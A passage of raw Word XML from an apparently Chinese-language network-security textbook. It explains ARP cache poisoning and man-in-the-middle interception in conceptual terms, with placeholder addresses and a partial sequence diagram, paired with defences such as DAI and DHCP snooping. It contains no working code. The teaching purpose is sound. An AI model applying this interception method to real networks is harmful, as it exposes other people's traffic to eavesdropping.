        </w:rPr>
        <w:t xml:space="preserve">过程，从而获知哪个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被分配到了哪个端口，进而阻止来自错误端口的非法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">宣称；终端可以静态绑定关键网关的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，或部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控代理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节将遵照攻防对称原则：在详述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗机理、MITM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手法和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">观察方法后，立即转入蓝队防御——动态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测（DAI）、DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Snooping、静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表、异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控和端到端加密——并结合习题和延伸阅读巩固理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:id="111" w:name="原理直觉一个无人查验身份的广播域"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：一个无人查验身份的广播域</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">想象一个大型开放式办公室，每个人坐在自己的工位上。当你想给财务部的张经理送一份文件时，你站起来大喊：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“张经理在哪个工位？”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。正常情况下，张经理会举手回应：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“我在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">号”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答，然后你把文件送到那个工位。问题是，任何人都可以站起来冒充张经理大喊：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“我在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">号！”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而你没有任何办法验证这个回答是否真实。接下来，所有你本来要送给张经理的文件都会被送到冒名者手中。冒名者可以看完文件内容后，再悄悄转交给真正的张经理——于是你和张经理都感觉不到异常，但所有机密内容已经被第三方窃取。这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中间人攻击的核心场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">失效边界</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上述类比假设一个平坦的广播域（所有主机在同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN，无端口安全，无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DAI）。在实际受控网络中，交换机的端口安全（Port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）可以限制每个端口的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址数量；DAI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定表校验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文；静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表项也可以彻底阻止网关节点的缓存被篡改。但这些防御机制各有部署成本和覆盖盲区，将在防御对照框中详述。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:id="115" w:name="正文arp-欺骗机理与中间人攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正文：ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗机理与中间人攻击</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="112" w:name="arp-缓存毒化的协议层面分析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存毒化的协议层面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP（Address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Resolution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol，地址解析协议）定义于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">826，其报文格式极为简洁——操作码（请求=1，应答=2）、发送方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC/IP、目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC/IP，无任何认证字段。当一台主机收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答时，无论该应答是否对应自己发出的请求，操作系统内核都会将应答中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射关系更新到本机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存表中。这一行为被称为“无偿</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP”（Gratuitous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP）的设计特性，最初用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址变更通告和冗余网关切换，却成了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗的通用入口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者持续向目标主机发送伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：向目标主机宣称“网关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;GATEWAY_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ATTACKER_MAC&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”，导致目标主机的出站流量全部发生攻击机。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：向网关宣称“目标主机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VICTIM_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ATTACKER_MAC&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”，导致网关发往目标主机的入站流量全部发生攻击机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">两边同时欺骗即可建立完整的双向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通道。由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存在大多数操作系统中具有超时机制（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 30 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒到几分钟不等，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分钟，具体值因版本而异），攻击者必须以短于超时值的频率持续发送伪造应答，维持毒化状态。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkStart w:id="113" w:name="中间人mitm流量的改道路径"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中间人（MITM）流量的改道路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid sequenceDiagram </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">展示了在经典</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景中，受害者、攻击者和网关三方之间的报文流向（单向对称起见，只画出受害者出站方向，入站方向同理反向）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant V as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Victim</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant A as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant G as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gateway</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant S as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外部服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发&lt;br/&gt;并持续发送伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A--&gt;&gt;V: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答：网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒重复)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A--&gt;&gt;G: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答：受害者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over V: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存被毒化&lt;br/&gt;网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射为攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
